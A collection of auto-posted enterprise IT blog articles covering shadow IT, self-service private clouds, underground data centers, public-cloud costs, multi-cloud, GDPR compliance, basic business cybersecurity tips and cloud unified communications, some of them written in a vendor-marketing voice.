Facing Up To The IT Shadow

Certain psychological schools of thought posit the existence of “the shadow,” a scary figure which lurks in the darkness of the psyche affecting everything we do.

The decentralized, virtualized environment which now characterizes business IT architecture has also given rise to a shadow. And just like its psychological counterpart, so-called shadow IT operates out of sight of business management and can sometimes appear dangerously out of control. It can be painful to look at but if IT professionals fail to deal with shadow IT, it has the potential to do severe damage in terms of data loss and non-compliance fines.

Facing Up to the Shadow

Shadow IT can be thought of as the sum of all the network assets not directly authorized and controlled within your current business IT policies. It includes but is not limited to devices such as unauthorised smartphones and tablets; cloud services like DropBox and Google Docs and third-party applications. As a responsible IT professional, ignoring shadow IT is not a viable long-term strategy.

First, ignoring shadow IT allows it to continue and grow in secret, increasing its ability to undermine security and utilize network resources.

Second, the difference between your authorized IT and shadow IT may not be appreciated by those higher up in the corporate food chain. To the leadership team, if something breaks and it is due to IT, the buck stops with the IT department. Ignorance may turn out to be no defense should your company lose data or are financially impacted by untamed shadow IT.

Third, by actively getting a grip on shadow IT, turning it into numbers and bringing the issue up to the board you are more likely to secure both the respect of the leadership team and even procure additional resources to help you to do your job.

Finally, anything that harms the business as a whole will harm you as a department and as individual employees. There is no valid case to be made for ignoring shadow IT.

How to Detect Shadow IT

Once you have decided to face the nightmare of shadow IT, the first step is to incorporate it into your existing network monitoring system.

You will undoubtedly already have network management software set up which can monitor the assets used by users who are logged in to their company accounts. By analysing each user’s assets, it can be determined if non-authorized devices or services are being accessed.

Nevertheless, you should still set alerts for the appearance of new and unknown devices on the network and carefully compare scans to pinpoint when and how they are making a connection. Regularly checking process logs from firewalls and proxies for evidence of shadow IT is also advisable.

As with all IT monitoring and troubleshooting processes, the frequency and granularity of scans will need to be weighed with the resource cost but if extensive shadow IT is suspected, creating a dedicated shadow IT project is well worth considering, particularly when factoring in the potential privacy, security, and compliance issues involved.

Using Specific Shadow IT Detection Software

There are now countless apps, virtual services, and cloud providers in Los Angeles, Miami, New York, and further afield. It can be almost impossible to identify and trace their signatures from a firewall log.

As part of your shadow IT clean-up drive, it is worth considering the shadow IT-specific software that is increasingly available to IT professionals.

Some software can monitor the network for thousands of different applications and cloud services not yet categorized by firewalls and proxies, simplifying and speeding up the shadow IT detection process. Access count, traffic patterns, and usage trends can add more information to build up a fuller picture of the extent of shadow IT exposure.

Some services can assist pressurized IT professionals even further by analysing and categorizing cloud services in terms of risk, helping them to prioritize those services and platforms that are posing the greatest security risk. As would be expected, data can be modified and customized to suit individual company risk profiles and reports can be filtered and converted into various formats (csv, Excel, pdf, etc.) to help present the data in a meaningful way.

Some services include policy enforcement capability, restricting access rights and, when integrated with firewalls and proxies, helping to identify new and insecure configurations.

Embracing the Shadow

Recognising and facing up to the shadow — and shadow IT — is the easiest part. The road to healing comes from embracing it, no matter how much it worries and disturbs you.

This is not something that the IT department can or should be wholly responsible for. Shadow IT is a signal that the business is either not providing a critical service or tool or that the tools it does provide are not fast or smart enough. After all, if the head of finance is logging on to his/her smartphone to access company accounts out of hours, is it because they don’t have the option of a company-owned device? If the business is asking the marketing team to deliver multi-gigabyte files to third-parties with nothing but an email account to work with, is it any wonder they are using DropBox or WeTransfer?

Rather than blaming employees for using shadow IT and banning it (which is unlikely to work anyway), a more productive stance is to ask them what they need to do their job and to look for in-house solutions. Some companies call a shadow IT amnesty whereby employees are called to safely disclose any non-authorized IT they are using with a view to finding alternative workarounds rather than punishing them.

The business can then follow this “no questions asked” policy with a deep security audit whereby existing policies are refined and redrafted and automated policy controls installed with any future changes requiring approval from the leadership team. Policy actions might include blocking access to the highest risk services altogether and restricting access to others (e.g., setting permissions to  “read-only” either across the board or depending on user role).

Shadow IT is a fact of the modern workplace, arising from the increasing availability of enterprise-grade technology in the public sphere. Although facing and sizing up the shadow is a necessary first step, only by truly embracing its existence can a business draw the necessary lessons and use these to neutralize the very real danger it poses.

Powered by WPeMatico

Keys To Agile Software Development

Organizations want to move to a continuous integration/continuous deployment (CI/CD) model in software development and the cloud can help, but there are key obstacles standing in the way. For example, in many software companies, the IT operations (IT Ops) team has a lengthy procurement and provisioning cycle, and developers may have to wait anywhere from several days to a few weeks for IT Ops to handle each request for new tools or workspaces.

In addition, there is a lack of automation in IT Ops procurement and provisioning cycles. For example, developers may be using an outdated IT ticketing system to request infrastructure and software — each time a developer issues a ticket request, an IT Ops person must follow a certain workflow to fulfill that request, and must complete each step before sending the ticket on to the next IT Ops person in the chain.

Silos are another obstacle. In large enterprises, IT Ops teams have silos — individuals or sub-teams with different responsibilities at different levels. Each individual or sub-team fulfills certain tasks for a Dev/Test request separately from the others. These silos turn IT Ops procurement into a series of handoffs, where each team member must complete their assigned tasks before handing the job off to another team member. This results in delays, where DevOps people must wait for requests to move through the IT Ops pipeline as each person in each silo performs their separate tasks. The silos create a lack of collaboration between separate IT Ops teams, and between IT Ops and DevOps, when ideally they should all be working together to accelerate the procurement process.

A self-service private cloud will remove these obstacles, helping to clear the IT Ops pipeline while providing developers, testers, and QA people with the IT infrastructure and tools they need for ongoing CI/CD development. According to Gene Kim, “When self-service provisioning can be done quickly and consistently through complete virtualization, you eliminate the obstacles to give developers, testers, and QA the environments they need for continuous integration and continuous deployment.”

The following are some attributes of a self-service automated cloud.

On-Demand Self-Service Provisioning

A self-service private cloud should offer a set of automated provisioning tools so developers and testers can create their own Dev/Test environments. It should include both a self-service user interface and an API-driven infrastructure-as-code that lets developers create VMs and databases, access storage, set up network connections, etc., using RESTful API coding.

In essence, a self-service private cloud automates the provisioning process by letting developers and testers manage their own initial deployments and configurations. This removes many of the confusing and error-prone manual steps that IT Ops people must go through to deliver the infrastructure and software stacks that developers need. It also removes the silos within the IT Ops organization, as it puts provisioning of individual elements (VMs, databases, storage, etc.) in the hands of developers.

An Intelligent and Well-Organized User Interface

A self-service private cloud should have an intelligent user interface (UI) that gives developers access to a set of common infrastructure tools (e.g., VMs, Oracle, or SQL Server databases, storage, network connections) and applications. This eliminates the old ticketing-based processes where users must submit multiple tickets to IT Ops to build their physical and software stacks, allowing developers to set up their own DevOps environments on the private cloud with just a few clicks.

Ideally, a self-service UI should allow IT Ops administrators to assign resources in an organized manner. They should be able to designate business units (BUs) on the UI (e.g., “AppDevTeam1,” “WebDevTeam1”) based on units within the company; assign team members to BUs; and designate current projects (e.g., “AppDevProject1”) on the UI according to BU. They should also be able to assign quotas to each BU (e.g., AppDevTeam1 gets 100 VMs, 25 vCPU cores, 100 GB memory, and 400 GB storage), and to each individual project (e.g., AppDevProject1 gets 10 VMs, 5 vCPU cores, 8 GB memory, and 40 GB storage).

Application Store

A self-service private cloud should have an online “application store” that provides single-click access to common development tools and services, such as:

  • CI/CD tools such as Jenkins, Git, Maven, and Junit
  • Workload management tools such as Ansible, Puppet, and Chef
  • Middleware services such as RabbitMQ and Redis
  • Storage back-ends such as MySQL, Postgres, Cassandra, and MongoDB

The private cloud should also allow IT Ops to place commonly-used applications on the self-service UI to give developers and testers even easier access to them. For example, IT Ops can make a duplicate of the production environment available on the UI for testers. They can then update the clone production environment every few months to make sure testers are using the most current and accurate duplicate.

Seamless, two-way cloud migration

A self-service hybrid should have seamless two-way migration to allow developers and testers who have public cloud access to easily move applications and workloads back and forth between public and private clouds.

Administrative dashboards

A self-service private cloud solution should have a set of administrative dashboards that allow the IT Ops team to control access to resources on the UI. These dashboards should give admins complete visibility into which teams and team members are utilizing which resources, and allow the IT Ops team to perform admin tasks such as:

  • Creating user accounts and passwords on the UI
  • Creating BUs, and projects for each BU, on the UI
  • Assigning developers and testers as “members” of a certain BU or project
  • Assigning self-service infrastructure tools (compute, storage, network) on the UI, and setting quotas for those tools according to BU or project
  • Importing new applications to the application store or the UI

A Software as a Service (SaaS) platform

A SaaS platform with portal-based access is the best venue for a self-service private cloud solution. A SaaS platform provides the flexibility to do upgrades and customization to the various features of the UI, application store, and administrative dashboards. The flexibility of the SaaS private cloud solution gives it the potential to become the de facto standardized platform for CI/CD and deployment in agile software development.

Conclusion

Both Dev/Test and IT Ops teams are under pressure to support the demands of agile development, but they have different goals. Developers and testers want to achieve faster time to market in delivering applications to their customers. Meanwhile, IT Ops teams want to achieve a faster time to value in delivering IT resources and applications to Dev/Test teams to support their goal of faster time to market.

As we’ve seen, the obstacles that hinder these goals — lengthy procurement and provisioning cycles, lack of automation, internal silos that create bottlenecks — are formidable, but can be overcome with the right technologies. A self-service, automated private cloud empowers developers and testers, giving them the tools they need to create their own DevOps environments. It also frees IT Ops teams from manual provisioning tasks, allowing them to provide developers and testers with IT resources in a more direct and timely manner. In short, a self-service private cloud helps both developers and IT Ops teams achieve their separate goals of faster time to market and time to value by clearing IT Ops obstacles to support the ongoing CI/CD cycle.

Powered by WPeMatico

The Cloud Goes Underground

Extreme weather, seismic events, and even rodents have compromised the physical security of cloud servers and other data center infrastructure. Selecting an underground colocation facility with above industry standards provides the solution to these and other threats.

With cyberattacks such as Petya and WannaCry making big headlines recently, it’s understandable that fortifying cybersecurity is top-of-mind for many CIOs. Last May, WannaCry invaded 200,000 computers in 150 countries, including the U.S., UK, Russia, and China, as it attacked hospitals, banks, and telecommunications companies.

A mere six weeks later, Petya struck — first hitting targets in the Ukraine, including its central bank, main airport, and even the Chernobyl nuclear power plant before quickly spreading and infecting organizations across Europe, North America, and Australia. Its victims included a UK-based global advertising agency, a Danish container ship company, and an American pharmaceutical giant.

Virtual Security Is Only Half the Equation

According to the 2017 BDO Technology Outlook Survey, 74% of technology chief financial officers say cloud computing will have the most measurable impact on their business this year, while IDC predicts that at least 50% of IT spending will be cloud-based in 2018. Although cyberattacks remain a significant threat in this environment, it’s important to remember that virtual security is only half of the equation. With the cloud growing ever more critical to businesses, ensuring the physical security of cloud servers is also essential.

Physical security at the colocation or data center facility is critical to effectively safeguarding not only cloud computing, of course, but also mission-critical business applications, data storage, networking, and computing related to Big Data analytics and emerging technologies such as artificial intelligence and IoT-enabled devices. To be fully secure, companies must ensure that their colocation provider can deliver a high level of physical resilience on-site. As evidenced by the devastation wreaked by Hurricanes Harvey and Irma, these physical threats include extreme weather events, but also seismic disturbances, breaches by unauthorized intruders, and given the current geopolitical climate, terrorism.

Explosives and Squirrels

In recent years, many customers have deprioritized physical security from their data center to-do list. However, physical threats remain real and have the potential to become much more sophisticated. As the late Uptime Institute founder Kenneth Brill wrote, “The oldest cyber frontier is actual physical attack or the threat of attack to disable data centers. Previously in the realm of science fiction, asymmetrical physical attacks on data centers by explosives, biological agents, electromagnetic pulse, electric utility, or other means are now credible.”

While electromagnetic pulses do sound like the stuff of science fiction, some physical security breaches perpetrated against data centers have been more suggestive of a Quentin Tarantino crime drama, and others, a Pixar animated movie for children starring woodland creatures. This is not to minimize the economic impact or the damage these attacks on record have caused to business reputation.

Consider the Chicago-based data center that experienced a physical security breach not once but twice in the span of two years. In the first breach, a lone IT staffer working the graveyard shift was held hostage and his biometric card reader taken from him, allowing the masked assailants to freely enter the facility. They made off with computer equipment estimated at a cost of upwards to $100,000. In the second, resourceful miscreants managed to break through a wall using a chainsaw and stole servers.

Yahoo once saw half its Santa Clara data center taken down by squirrels that managed to chew their way through powerlines and fiber-optic cables. Google “Yahoo and frying squirrels” if you think this episode is referenced merely for entertainment purposes. It is not.

Among the most infamous physical breaches to have taken place was a 2011 attack on Vodafone’s data center in Basingstoke, England. A gang broke in and stole servers and networking equipment, causing systems to go down and the telecom company’s business reputation to suffer greatly.

The Rock-Solid Safety of Colocating Underground

For some companies, the cloud and IT infrastructure altogether have moved even farther from the skies to underground data centers. Data center operators have been retrofitting underground bunkers into functional data centers for many years. But as security and energy demands as well as concerns about terrorism have lately intensified, there’s an increasing trend towards building subterranean colocation facilities to host mission-critical infrastructure and data.

Today, you’ll find underground data center facilities in Lithuania, the Netherlands, Switzerland, Ukraine, the United Kingdom, and Sweden, as well as the U.S. Some of these facilities were previously the site of mining operations while others were originally Cold War era bunkers designed to protect citizens in the event of a nuclear attack.

Surrounded by rock, underground data centers are highly physically secure, and since subterranean temperatures are naturally regulated, environmental conditions are more efficient. But not all underground data centers are created equal. Key design factors to consider during the site selection process include utilities infrastructure, availability and capacity of fiber-optic systems, the risk of natural and man-made risks, and how well the physical perimeter of the facility can be secured.

The issue of location is especially critical, and any data center selection needs to consider whether the facility is in a flood zone or if the region has an unstable seismic profile. The most fortified underground data centers also implement multi-layered security access methods, including visual inspections from multiple 24×7 guard stations, keycard access, video monitoring, and biometric scanning. Best practices incorporate mantraps and restrictive access policies for each customer’s space, providing security within each zone of the facility.

To ensure business continuity, it’s advantageous that all critical infrastructure of a subterranean data center be located underground. This extends to dual utility feeds backed up by two MW generators and N+1 critical infrastructure components, including UPS, chillers, and battery back-up. Such a design is further enhanced by being a SOC 2, Type 2 certified data center, ensuring the customer’s confidence in the provider’s 100% uptime guarantee, if indeed they offer one at all.

And because connectivity means everything, subterranean facilities should also have access to high-speed, carrier-class internet and data services through a fiber network that runs in and out of the data center via multiple fiber paths and entrances.

From presidential bunkers and NORAD facilities hosting military analysts, to scientists studying astrophysics in subterranean laboratories, and to Warner Brothers film archives stored safely away from the elements, some of the world’s most essential personnel, valued assets and activities are located underground, protected from natural and most man-made disasters. So, why should your cloud servers and critical data be any different?

But the crux of the matter is this: while cyberattacks are on the increase and the cloud can be vulnerable, the importance of physical data center security cannot be overstated. The underground data center is a prime example of using the earth’s resource to offer protection from natural and unnatural disasters.

Powered by WPeMatico

What You Don’t Know About Public Cloud Might Hurt You

Companies seem to be moving to public cloud in droves, as conventional wisdom would have us believe it’s more user-friendly, scalable, and affordable than private cloud. So is it ‘bye bye’ on-premises storage? Is that the way to go? Not necessarily.

While public cloud has been increasingly adopted over the last several years, there is also a new trend where organizations are waking up to the hidden costs involved, both in fees beyond the quoted price per GB and in the potential cost to a business’s data security. Companies are finding that data transit fees for public cloud storage can double the cost of basic storage, and can be as high as three or four times if data is moved often. Yet, these fees are frequently ignored when organizations are considering the use of public cloud. This leads to gross miscalculations and over spending. Then there is the question of data security and availability. Breaches of public cloud have become commonplace, and yet organizations are lead to believe the public cloud is safe for the most sensitive data. How can this be?

The answer is two-fold. The major public cloud providers have huge marketing budgets and with that comes the ability to dominate the airwaves with their message, getting in front of a large set of customers. Secondly, public cloud can be the right solution under certain circumstances, primarily for short-term storage. But with recent headline-grabbing public cloud outages from the likes of AWS S3 and Azure, and related data leak risks coming to light, the fundamental importance of keeping greater control over the most critical data has come back into focus. 

A related problem is that CIOS and IT leaders are failing to read the fine-print on their public cloud contracts. In many of these contracts, the vendor has very little obligation to the customer. In reality, durability and availability should be managed just like an on-premises storage structure, where the CIO needs to superimpose an architecture on top of cloud to establish the desired level of certainty.

This all leads to organizations investing heavily in public cloud solutions that not only lack control over security and data locality, but also in the long run, cost more.

So why does everyone think public cloud is cheaper?

Perception and reality of the public cloud do not always align. Although the public cloud may appear more affordable, and is certainly marketed that way, the reality is that once organizations are tied into recurring monthly fees, this is an expensive outlay. Not to mention that transit and other fees can be vastly more than you ever imagined. Some cloud service providers also charge per user, so although public cloud promotes unlimited scalability, this can come with a heavy price tag. 

Many companies also use public cloud as a way to ensure increased data resilience, where data stored in the public cloud can use a form of data protection called erasure coding. However, erasure coding only protects against certain hardware failures. It does not protect against input errors, human maliciousness, ransomware, malware of all kinds, or software corruption. Erasure coding can also add significant latency, affecting application performance and response time. It is also common for public cloud vendors such as Amazon to charge for replication, or the copying of data, across multiple data centers, adding to the cost further. As a result, IT teams often end up selecting a less sophisticated public cloud vendor, in effort to save cost, but this then introduces more risk as these smaller vendors also have less sophisticated protection.

In contrast, on-premises private cloud can provide the same agility as the public cloud, but within the organization’s own environment, offering more functionality such as higher performance, local control and protection against malware.

Data is the lifeblood of an organization and critical to its success, which is why more businesses are retaining information for longer and using this to gain insight into customer behavior and trends. Storage is therefore critical and companies need a comprehensive IT infrastructure that is built to offer the same agility of the public cloud, such as seamless file sharing, but with the added security and capability on-premises offers, to safeguard a company’s most sensitive data long-term. 

 

Availability and security

Relying on third party public cloud providers also brings into question availability and security. As the aforementioned outages demonstrate, public cloud services are not immune to suffering through downtime. This is something smaller organizations especially cannot afford. Although AWS, for example, recovered from its outage several months ago, and only suffered a small impact in terms of its revenue, it’s not always the same story for SMBs that may not be able to recover. Downtime in any form for smaller organizations can have critical consequences.

So is public cloud too risky? To be clear, public cloud isn’t going anywhere and it provides crucial benefits to many businesses. However, before opting to trust a public cloud service provider with all of your data, it’s important to understand what data is most critical to business survival. For this data, too much is at stake to place it in the hands of an outside party, and with the additional cost, nothing about it is worth it. The only way to maintain full control, while also minimizing expenses, is through an on-premises solution as part of your infrastructure. This way, organizations can achieve the agility of the cloud at a lower cost and with guaranteed control over data privacy, availability and security when it’s most important. 

It’s time we updated the conventional wisdom on the role, limitations, and true cost of the public cloud.

Powered by WPeMatico

Multi-Cloud In The Context Of Market Verticals

As it is well-known, the cloud market is dominated by large cloud service suppliers (CSP) such as Amazon, Google, and Azure. Amazon Web Services is dominating the market with 47.1% of the Public Cloud Market Share. The smaller CSPs are increasingly having to diversify their offering and collaborating rather than competing with large and other small providers, for example to deliver specialised services specifically for a market vertical.

The concept of cloud computing is being defined and redefined again by the larger players and the smaller players are continually playing catch up. The agility and functionality of the smaller players however is increasing to support a more agile approach to integrating and working with public cloud providers. The large CSPs are interested in providing cost and profit effective computing services and the more niche specialist requirements are largely ignored. This has delivered a partnership advantage to the smaller CSPs. This is facilitated by tools such as AWS Direct Connect and Azure Express Route allowing on premises or data centre providers to scale into the public cloud on demand.

The concept of multi-cloud in the context of smaller providers is now being spread in multiple dimensions:

  • Hybrid cloud: Providing customers ability to hyper scale from their private cloud environment into public cloud providers.
  • Network connectivity: Providing interconnects to proprietary networks such as health and social care network (HSCN) which large public cloud providers are not capable of providing directly.
  • Backup and disaster recovery: Using geographically diverse and different CSPs/data center operators to deliver enterprise solutions.

Smaller CSPs need to be able to provide a comparable specialised service and toolset to be able to match the agility that the larger players provide.

Collaborate, not compete

Domain specific knowledge smaller CSPs now have means that larger CSPs are being driven to collaborate with the smaller providers to resolve the gap in their domain specific knowledge.

As an example, in the health care domain, CSPs with domain specific knowledge have gained that because they are close to the endusers. Often CSP domain experts are not engaging with technical people but with clinicians who are at the cutting edge of adopting new and innovative cloud based technologies as part of their service to patients. It is not just a case of CSPs selling equipment as a service, they need to create a service which meets the needs of the end user, and this cannot be done being one step removed from the user’s domain experts. An overall service offering to match all the client’s requirements in terms of availability, performance, security, privacy, etc. the will drive an increasing demand for an alliance with other CSPs. Providers will need to be prepared to enable and facilitate such scenarios. 

Reputation

Larger cloud service providers particularly delivering to the public sector must consider a reputational risk associated with their business relations with smaller CSPs. Recently, Data Centred, a Manchester UK-based data center provider was put into bankruptcy administration after its only customer, the UK government’s department of Revenue and Customs (HMRC), opted to move their complete environment out into the AWS public cloud. It can be argued that building a business on one, admittedly large, customer is high risk and Data Centred should have diversified and built a wider customer base. However, even if Data Centred had developed a more diverse customer portfolio the loss of this disproportionately large customer would have resulted in a major re-structuring, downsizing, and even then bankruptcy may not have been avoided. This has led to a public concern regarding the competition generated — predominately American providers — delivering  data center services to EU-based businesses and governments. To counter this perceived problem many public cloud providers are opting to work with local CSPs to front services that are supported by the public cloud.

Security and Privacy

In the CloudWATCH Summit in September 2017,  Nicola Franchetto, senior associate and data protection officer at ICT Legal Consulting explained that the upcoming General Data Protection Regulation EU Directive (GDPR) will broaden territorial reach compared to the current regime, The new directive will apply not only to data controllers and processors in the EU, but also to processors outside the EU that offer goods or services to data subjects in the EU and/or monitor the behaviour of data subjects in the EU.

In this context, small providers mastering local regulations and data protection in the cloud will play a valuable role as allies of those big players from within and outside the EU that need to demonstrate adherence to the EU GDPR. Further, application and service providers in privacy demanding vertical domains would be willing to opt for cloud offers that ease their compliance and supply them with the necessary security and privacy controlling mechanisms as those provided by MUSA framework.

In conclusion, the picture of cloud service provision is not as simple as the marketing of the larger CSPs would ask us to believe. Domain expertise and local expertise are frequently quoted as reasons for a collaborative approach to providing services, leading to an increase in multi-cloud service provision. The future impact of GDPR cannot be ignored by large CSPs and will further influence the need for partnership alliances. Large CSPs find that it is often easier to collaborate with smaller local CSPs rather than ignore them. After all, cloud computing is a collaboration between the customer and supplier and expanding that relationship is natural.

Powered by WPeMatico

How The Cloud Can Help Your Business Get Compliant With GDPR

The UK Brexit planning has started in earnest and companies and organizations are rightly looking at what leaving the European Union (EU) will mean to their operations and staff.

However, amid wide-ranging business concerns is a new piece of legislation affecting personal data which could potentially have similar aftershocks — and that’s general data protection regulation (GDPR) which will apply to the UK from May 25, 2018.

GDPR is intended to strengthen data protection for individuals within the EU while imposing restrictions on the transfer of personal data outside the European Union to third countries or international organizations.

It would be a mistake for any data controller or processer to assume that because they know and adhere to the existing Data Protection Act 1998 (DPA) that it will be similar and therefore no additional compliance is required.

GDPR will have a set of new and different requirements and for any organization which has day-to-day responsibility for data protection, it’s imperative that they monitor the regulations and ensure that their organization can be compliant-ready ahead of next year.

Compliance requires investment as well as specialist knowledge and many business leaders are looking at how the cloud will be able to help with their data storage, protection, and management and meet GDPR compliance as well.

GDPR is the biggest challenge facing data management in the last 20 years; it’s no understatement to say that it is presenting business leaders with a headache.

A survey from analyst firm Gartner earlier this year showed that around half of those affected by the legislation, whether in the EU or outside, will not be in full compliance when the regulations take effect.

The message coming forward is that the cloud is the preferred option to help with the upgrading of data security practices and data protection standards in line with the regulations.

As the May 2018 deadline nears ever closer, moving data to the cloud can help ease the burden faced by senior IT leaders, many of whom see GDPR compliance as their top priority.

As a leading cloud services provider, we are increasingly being asked about GDPR considerations from concerned clients migrating to the cloud.

We believe that the task of migrating people’s data such as emails, contacts, files, calendar, and tasks over to Office365 will make compliance easier for organizations.

During any cloud migration process, the most important result, particularly with the need for GDPR compliance ahead, is that data sovereignty is maintained and full control with comprehensive reporting is provided.

After migration comes management and it’s the next big part of the cloud which is vital to GDPR compliance to address security and data protection.

Organizations and service require a tool with the ability to control multi-tenant Office 365 users in a very intuitive and cost-effective way.

With the need for increased security, bulk transaction processing, advanced hierarchical management capability, and role-based access control will all help companies to comply with increasingly stringent access controls required by GDPR.

GDPR compliance before May 25, 2018 isn’t an option for those doing business with EU countries, it’s a necessity. Organizations will need to look across their business and manage their data holistically to ensure compliance and avoid sanctions. With GDPR coming into effect in a matter of months, the time to act is now.

Powered by WPeMatico

5 Ways To Protect Your Business From Being Hacked

The past couple of months have been a huge wake-up call for businesses in terms of their cybersecurity. With large enterprises such as Equifax being successfully attacked, costing the company billions, as well as their reputation as a reliable service to trust, there are no longer any doubts regarding the importance of protecting company-sensitive information.

Protecting your business from cyber criminals is easier said than done. For every new security measure you integrate into your business, cyber criminals mastermind a new method to circumvent your security and access critical data.

This doesn’t mean you can’t protect your data from hackers. Here are some techniques which you can implement that will greatly diminish the chance of being successfully hacked.

Encrypt Business Critical Data to Mitigate the Risk of Being Hacked

Think about all the customers that your company has gathered personal credentials on in the last year alone. Imagine having to explain that your data has been breached, and is in the looming grasp of an unidentified cyber criminal? This is not a conversation that any CEO should have to initiate.

It is important to encrypt all sensitive data. Good data protection practices also include making use of trusted, and credible financial service providers such as PayPal or Google Wallet.

Ensure That Your Security Software is Up To Date

Your employees are immensely valuable to the daily operations of your business. At the same time, due to their daily interaction with company-sensitive information, they are also your Achilles heel.

In order to reduce the risk of viruses such as malware and spyware, it is important to keep your antivirus software up to date. Employees are known to browse “shady” websites for entertainment now and then during a workday — it is inevitable in most establishments.

However, if you wish to mitigate the risk to your company, it is important to limit the sites that can be accessed through work terminals to diminish the window of opportunity for an attack against your company.

Physical Security Has Never Been More Important

The mistake that many businesses make is focusing solely on online security and neglecting to secure their physical assets — this doesn’t mean you have to hire people to guard your computers. However, you should consider the physical security of you, your team, and your workplace, is just as important as your cybersecurity.

Through doing this you eradicate the chance of a physical breach of data — such as stolen hardware. This may not stop the typical thief, but it will make them reconsider whether the job is worth the time and effort it will take.

Protect Yourself from Common Cybercriminal Techniques

Cyber criminals work diligently to find vulnerabilities in a company’s security. The smallest flaw in your security is a door wide open for any looming, knowledgeable cybercriminal. The good news is that there are fairly easy patches to rectify vulnerabilities in your security system.

One common form of cyber attacking is SQL (structured query language) injection. Essentially, criminals focus on placing questions to your e-commerce site in order to extract sensitive information from your database.

Another frequently used technique is known as cross-site scripting. This attack focuses on extracting data from unwitting consumers, who are intercepted while they load your page, and taken to a malicious website.

Both of these attack strategies can cause irreparable harm to your business. This just emphasizes the importance of ensuring that you implement the use of a trusted e-commerce platform. The good news is that due to the online nature of these web-platform techniques, you can prevent the risk by implementing a web application firewall protocol.

Secure Your Data in Case of Emergencies

Oftentimes, ransomware is injected into a business database. When criminals hit your business, their main objective is to blackmail you with your own data. Although, the cost is different depending on the malicious intent of the hacker. However, one thing is for certain — it will be costly to your business.

If you’re starting to wonder how you can afford to make these changes, consider cutting back costs in your business to give you some more spending money. For example, consider automating your accounts payable department. This will prevent you from overpaying your employees to do a task that can be done through payment software.

Malicious breaches will also drastically diminish the trust that customers place into your establishment. In order to reduce the risk of being blackmailed with ransomware, businesses are advised to implement an effective data recovery tool for their businesses.

Not only will this protect you from the consequences of cybercrime — but it will also mitigate the risk of losing data during severe incidents such as natural disasters.

Stay on Top of it and Embrace Security

Unfortunately, it’s possible that your business can still be hacked no matter how hard you try to avoid it. Keeping your staff educated is a huge way you can keep your business as safe as possible. The last thing you want is for your employers to start caring after an attack has already taken place. As long as you are prepared, you can possibly stop the attack before it ruins all of your data.

Powered by WPeMatico

Why You Should Consider Moving Unified Communications To The Cloud

In today’s evolving business landscape, executives are looking to technology to help transform their operations, enabling them to be more agile and efficient. To help achieve this, executives are increasingly incorporating cloud solutions into their business strategies to help them stay competitive. Whether it is virtualizing the data center, deploying new applications or extending network capacity, cloud solutions are becoming critical for today’s enterprise companies. With this in mind, enterprises are increasingly considering moving unified communications (UC) into the cloud as well.

Cloud services for unified communications can offer measurable value for organizations when compared to traditional PBX services. As communications equipment becomes outdated or needs to be replaced, a cloud service can look especially attractive as it can offer a host of benefits that are essential in executing a wide range of digital transformation initiatives. Outlined below are several reasons why you should consider choosing a cloud-based unified communications model as your next unified communications solution.

Cost-Effectiveness

One of the main reasons companies look to cloud solutions for their unified communications needs is the cost advantage. Today, it is very cost-effective to host a phone system over the internet because businesses are charged for the service and not the expensive switching equipment located on premise. This eliminates the need to pay for the necessary installation and maintenance costs that a traditional phone system would require. Additionally, most cloud phone systems offer unlimited local and long distance calling, which also is a substantial benefit for businesses looking to minimize expenses.

Ease of Use

Because of the complexity of today’s communications systems, it can sometimes take an entire IT department or a third-party vendor just to manage the upkeep of a traditional phone system. Cloud-based communications can help alleviate the burden by eliminating maintenance, IT workload, and some of the more costly internal infrastructure. Having a standardized point of contact and connectivity can streamline operations for IT teams, enabling them to focus on driving future business initiatives instead of maintaining current systems.

Quality of service

For every business, uptime is pivotal, and cloud solutions provide good uptime from partners in the space. To keep operations running smoothly, businesses rely on the ability to leverage remote work teams, manage multiple office spaces or serve customers from anywhere in the world. For businesses requiring this flexibility, cloud communications maximizes coverage through multiple data centers, helping them avoid costly interruptions and potential downtime.

Functionality

On-premise phone systems can bring challenges to an organization that is expanding quickly or has varying needs. Alternatively, cloud-based unified communications solutions can provide the flexibility and scalability that a business needs whether it is adding a new office space, moving locations, or sizing up or down now or in the future. When using cloud-based systems, businesses can access and add new features without any new hardware requirements, offering quick and easy solutions for both installing and maintaining unified communications systems.

Digital transformation and cloud solutions are revolutionizing multiple industries, and unified communications is no exception. To ensure your business is adequately prepared for a digital transformation, it is critical to begin integrating cloud-based applications into your current unified communications model. As businesses continue to evolve and adopt new technologies, remaining agile and scalable based on need is becoming increasingly important. With every business looking to keep up, offering solutions that will provide considerable business value will be beneficial now and in the future.

Powered by WPeMatico